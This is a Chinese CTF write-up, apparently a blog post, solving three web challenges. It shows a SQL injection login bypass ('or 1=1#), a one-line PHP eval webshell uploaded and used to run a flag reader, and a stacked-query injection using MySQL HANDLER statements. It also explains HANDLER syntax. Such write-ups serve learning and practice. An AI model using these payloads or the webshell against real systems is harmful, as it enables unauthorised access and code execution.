简单的招聘系统
登录页面存在二次注入,在username一栏填入’or 1=1#就可以以admin身份登录(必须处于未注册状态才可行).以admin身份登陆后,进入blank(全名忘了)页面,有一栏search,在search栏利用admin的数字key进行insert报错注入.(当然也可以用sqlmap一把梭).
ezupload
官方题解发出来才发现我的做法是非预期…
打开是一个上传文件的页面,bp抓包之后直接传了一句话木马的php文件,一句话木马内容:<?php @eval($_POST['pass']); ?>
,上传成功后使用蚁剑连接,根目录有一个readflag程序,使用蚁剑自带的虚拟终端运行该程序即可.
附上预期解:
本题考查apache ssi rce 漏洞。
访问题目首页是一个文件上传,可通过上传shtml来生成php一句话木马
blacklist
本题改编自2019强网杯随便注,但过滤了rename,set等,所以原题做法不可行,但前面部分payload还是可以照抄的.BUUCTF-Web-随便注(三种解题思路)一直查询到字段之后,就需要换别的方式来解出本题了.由于本题数据库为mysql,所以我们可以使用handler语句.
以下内容出自右边文章:mysql查询语句-handler
handler语句简介
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表.
基础语法
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的句柄。
通过索引去查看的话可以按照一定的顺序,获取表中的数据。
通过HANDLER tbl_name READ index_name FIRST,获取句柄第一行(索引最小的一行),NEXT获取下一行,PREV获取前一行,LAST获取最后一行(索引最大的一行)。
通过索引列指定一个值,可以指定从哪一行开始。
通过HANDLER tbl_name READ index_name = value,指定从哪一行开始,通过NEXT继续浏览。
如果我们不想浏览一个表的所有行,可以使用where和limit子句。
回到题目
通过handler语句我们可以构造payload:1';handler FlagHere open;handler FlagHere read first;#
如此即可获得flag.
废话part:不会的题目很多,希望下次能做出更多题.
No responses yet